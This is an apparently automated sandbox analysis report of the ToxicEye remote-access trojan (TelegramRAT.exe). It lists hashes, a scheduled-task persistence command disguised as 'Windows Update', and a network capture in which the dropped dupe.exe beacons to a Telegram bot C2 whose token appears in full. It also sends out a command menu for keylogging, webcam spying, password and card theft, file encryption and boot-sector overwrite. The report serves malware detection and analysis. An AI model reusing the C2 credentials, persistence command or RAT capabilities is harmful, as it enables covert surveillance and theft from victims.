Analysis

  • max time kernel
    95s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18-07-2024 13:19

General

  • Target

    TelegramRAT.exe

  • Size

    111KB

  • MD5

    3c6f5e7ca1f0279c860554b7b4dfaf5d

  • SHA1

    15c4baaa666353eb7dd5d28a76aead8bf14bc352

  • SHA256

    f7514a2e0e612b0b4211c4655fedc3a7052578f38f1bfe131e2213102c164e34

  • SHA512

    1c8ac972d4ef27ec0f80e850137a8f19c95c72b97f2dede9c4d0caf007709133a5f2e248f6f04bc6e30fbbea742b8f4ae66a4f3408ab0d00ca48c48865947b09

  • SSDEEP

    1536:l+b6QDWv5IDlOM91qQIwy3xZxdyyKDWfybhDqI6oQWVzCrAZuW5TDx:Ib2IpOLhZxjQbxqHoQWVzCrAZuWRx

Score
10/10

Malware Config

Extracted

Family

toxiceye

C2

https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319

Signatures

  • ToxicEye

    ToxicEye is a trojan written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Windows Update" /tr "C:\Users\Public\Downloads\dupe.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4344
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\tasklist.exe
        Tasklist /fi "PID eq 1644"
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3332
      • C:\Windows\system32\find.exe
        find ":"
        3⤵
        PID:4440
      • C:\Windows\system32\timeout.exe
        Timeout /T 1 /Nobreak
        3⤵
        • Delays execution with timeout.exe
        PID:1964
      • C:\Users\Public\Downloads\dupe.exe
        "dupe.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3456
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Windows Update" /tr "C:\Users\Public\Downloads\dupe.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2776

Network

    • flag-us
      DNS
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.dual-a-0034.a-msedge.net
      g-bing-com.dual-a-0034.a-msedge.net
      IN CNAME
      dual-a-0034.a-msedge.net
      dual-a-0034.a-msedge.net
      IN A
      13.107.21.237
      dual-a-0034.a-msedge.net
      IN A
      204.79.197.237
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38; domain=.bing.com; expires=Tue, 12-Aug-2025 13:19:28 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F9C3A6AFE3DF4CF68FE9BD4F1F8C5833 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:27 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=AI0qDoJNEo8O1iIScw3Zn9OdJf0WbtoleZJbbTpcNwo; domain=.bing.com; expires=Tue, 12-Aug-2025 13:19:28 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 692F83E9FFD1493C96C56EB6186B1923 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:27 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38; MSPTC=AI0qDoJNEo8O1iIScw3Zn9OdJf0WbtoleZJbbTpcNwo
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 5BACEA468FA240989B5298F9DBD7D198 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:28 GMT
    • flag-us
      DNS
      237.21.107.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      237.21.107.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.156.103.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.156.103.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      google.com
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      google.com
      IN A
      Response
      google.com
      IN A
      142.250.200.46
    • flag-us
      DNS
      api.telegram.org
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      api.telegram.org
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:36 GMT
      Content-Type: application/json
      Content-Length: 304
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:36 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:37 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:38 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:39 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:41 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:42 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:43 GMT
      Content-Type: application/json
      Content-Length: 413
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:43 GMT
      Content-Type: application/json
      Content-Length: 4991
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:44 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:45 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:46 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:47 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:48 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:49 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:50 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:52 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340 HTTP/1.1
